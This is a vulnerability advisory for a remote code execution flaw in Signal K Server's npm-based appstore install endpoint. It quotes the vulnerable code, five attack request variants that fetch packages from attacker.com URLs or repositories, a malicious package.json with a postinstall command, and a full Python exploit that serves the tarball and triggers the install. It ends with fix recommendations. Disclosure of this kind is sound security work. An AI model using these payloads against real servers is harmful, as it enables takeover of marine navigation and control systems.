CVE-2025-68619
Signal K Server Vulnerable to Remote Code Execution via Malicious npm Package
Description
The SignalK appstore interface allows administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any `postinstall` script defined in `package.json`, enabling arbitrary code execution. The vulnerability exists because npm's version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious `postinstall` script. ### Affected Code **File**: `src/interfaces/appstore.js` (lines 46-76) ```javascript app.post( [ `${SERVERROUTESPREFIX}/appstore/install/:name/:version`, `${SERVERROUTESPREFIX}/appstore/install/:org/:name/:version` ], (req, res) => { let name = req.params.name const version = req.params.version // No validation on version format // ... validation only checks if package name exists ... installSKModule(name, version) // Passes unsanitized version to npm } ) ``` **File**: `src/modules.ts` (lines 180-205) ```typescript if (name) { packageString = version ? `${name}@${version}` : name // Direct concatenation } if (process.platform === 'win32') { npm = spawn('cmd', ['/c', `npm --save ${command} ${packageString}`], opts) } else { npm = spawn('npm', ['--save', command, packageString], opts) } ``` ### Impact An attacker with admin credentials (obtained via the authentication bypass chain) can execute arbitrary commands on the server with the privileges of the SignalK process. This enables complete system compromise including data theft, backdoor installation, lateral movement, and denial of service. A compromised server can inject malicious PGN messages onto the NMEA 2000 bus or forge NMEA 0183 sentences, affecting all connected devices. Attack scenarios include manipulating autopilot systems (Pypilot, Raymarine, Garmin) via the Autopilot API to alter vessel course, spoofing AIS messages to create phantom vessels on radar, altering GPS position data sent to chart plotters and autopilots, injecting false depth sounder readings, manipulating wind instrument data, or sending shutdown commands to electronically controlled engines via NMEA 2000. Many vessels expose SignalK to the internet for remote monitoring, making them globally accessible to attackers. The vulnerability can be exploited using any of npm's flexible version specifier formats: **1. Real npm Package with Required Keyword** ```http POST /skServer/appstore/install/malicious-signalk-plugin/1.0.0 HTTP/1.1 Host: localhost:3000 Authorization: Bearer <VALID_AUTH_TOKEN> Content-Length: 0 ``` Publishing a malicious package to the official npm registry with the `signalk-node-server-plugin` or `signalk-webapp` keyword allows us to install arbitrary npm packages using standard semantic versioning format (`1.0.0`). This is non-stealthy as the package is publicly visible, but can be leveraged to spread malware via npm's ecosystem, since such a package will show up on the webapp feed and other users might install it. **2. Real npm Package via npm Alias** ```http POST /skServer/appstore/install/signalk-pushover-plugin/npm:malicious-package@1.0.0 HTTP/1.1 Host: localhost:3000 Authorization: Bearer <VALID_AUTH_TOKEN> Content-Length: 0 ``` The `npm:` prefix allows installing a package under a different name. For example, `npm:malicious-package@1.0.0` installs `malicious-package` but references it as if it were the legitimate `signalk-pushover-plugin`. This obscures the actual package being installed from casual inspection, making it stealthier while still requiring npm publishing. **3. Package Hosted on GitHub (GitHub Shorthand)** ```http POST /skServer/appstore/install/signalk-pushover-plugin/attacker%2Fmalicious-plugin HTTP/1.1 Host: localhost:3000 Authorization: Bearer <VALID_AUTH_TOKEN> Content-Length: 0 ``` The format `username/repo` (URL-encoded as `attacker%2Fmalicious-plugin`) is shorthand for `github:username/repo`. npm automatically fetches the repository from GitHub, extracts it, and runs `npm install`. If the repo contains a `postinstall` script, it executes. The repository must contain a valid `package.json` with the malicious script. **4. Package Hosted on Attacker-Controlled Git Server (git+ Protocol)** ```http POST /skServer/appstore/install/signalk-pushover-plugin/git%2Bhttps:%2F%2Fattacker.com%2Fmalicious-plugin.git HTTP/1.1 Host: localhost:3000 Authorization: Bearer <VALID_AUTH_TOKEN> Content-Length: 0 ``` The `git+https://` or `git+ssh://` prefix tells npm to clone a git repository. This works with any git server, not just GitHub. The attacker has full control over the repository contents and can update it at any time. This provides maximum control over the package source without relying on third-party services. **5. Package Hosted on Attacker Webserver as Tarball** ```http POST /skServer/appstore/install/signalk-pushover-plugin/http:%2F%2Fattacker.com%2Fpkg.tgz HTTP/1.1 Host: localhost:3000 Authorization: Bearer <VALID_AUTH_TOKEN> Content-Length: 0 ``` The `http://` or `https://` URL pointing to a `.tgz` file tells npm to download and extract the tarball. This is the most flexible method as it requires no external service dependencies - the attacker controls both the package contents and the hosting infrastructure. No git repository or npm registry account needed. All methods result in npm executing the `postinstall` script from the attacker-controlled package. A malicious npm package requires only two files to achieve RCE: **package.json** - Defines the package metadata and the malicious script: ```json { "name": "signalk-evil-plugin", "version": "1.0.0", "keywords": ["signalk-node-server-plugin"], "scripts": { "postinstall": "node -e \"require('child_process').exec('calc.exe')\"" } } ``` The `postinstall` script executes automatically after npm installs the package. **index.js** - Minimal plugin implementation to avoid errors: ```javascript module.exports = function(app) { return { id: 'evil-plugin', name: 'Evil Plugin', start: function() {}, stop: function() {} } } ``` ### PoC using the tarball variant of the exploit ```python import requests import tarfile import json import io import threading from http.server import HTTPServer, BaseHTTPRequestHandler from urllib.parse import quote TARGET = "http://localhost:3000" ATTACKER_IP = "localhost" ATTACKER_PORT = 9999 RCE_COMMAND = "calc.exe" # Windows; use "id > /tmp/pwned" for Linux TOKEN = "<VALID_AUTH_TOKEN>" def create_malicious_tarball(): package_json = { "name": "signalk-evil-plugin", "version": "1.0.0", "keywords": ["signalk-node-server-plugin"], "scripts": { "postinstall": f"node -e \"require('child_process').exec('{RCE_COMMAND}')\"" } } index_js = b"module.exports = function(app) { return { id: 'evil', start: function(){}, stop: function(){} } }" tar_buffer = io.BytesIO() with tarfile.open(fileobj=tar_buffer, mode='w:gz') as tar: # Add package.json pkg_data = json.dumps(package_json, indent=2).encode() pkg_info = tarfile.TarInfo(name="package/package.json") pkg_info.size = len(pkg_data) tar.addfile(pkg_info, io.BytesIO(pkg_data)) # Add index.js idx_info = tarfile.TarInfo(name="package/index.js") idx_info.size = len(index_js) tar.addfile(idx_info, io.BytesIO(index_js)) return tar_buffer.getvalue() def start_malicious_server(tarball_data): class Handler(BaseHTTPRequestHandler): def do_GET(self): print(f"[+] Victim fetched malicious package!") self.send_response(200) self.send_header("Content-Type", "application/gzip") self.send_header("Content-Length", len(tarball_data)) self.end_headers() self.wfile.write(tarball_data) def log_message(self, *args): pass server = HTTPServer(("0.0.0.0", ATTACKER_PORT), Handler) thread = threading.Thread(target=server.serve_forever, daemon=True) thread.start() print(f"[+] Malicious server running on port {ATTACKER_PORT}") return server def trigger_rce(token): tarball_url = f"http://{ATTACKER_IP}:{ATTACKER_PORT}/package.tgz" encoded_url = quote(tarball_url, safe='') url = f"{TARGET}/skServer/appstore/install/signalk-pushover-plugin/{encoded_url}" headers = {"Authorization": f"Bearer {token}"} print(f"[*] Triggering installation from {tarball_url}") r = requests.post(url, headers=headers) print(f"[+] Response: {r.status_code} - {r.text}") if __name__ == "__main__": tarball = create_malicious_tarball() print(f"[+] Created malicious tarball ({len(tarball)} bytes)") start_malicious_server(tarball) trigger_rce(TOKEN) ``` ### Recommendation 1. Restrict package installation to the official npm registry only by validating that version parameters match semver format 2. Use npm's `--ignore-scripts` flag to prevent automatic script execution 3. Implement an allowlist of approved packages 4. Consider sandboxing the package installation process While we understand that allowing 3rd party plugin installation is an intended functionality we believe that more secure practices must be applied to the whole process given the operational importance a SignalK instance can have onboard a vessel and it's rise in polularity.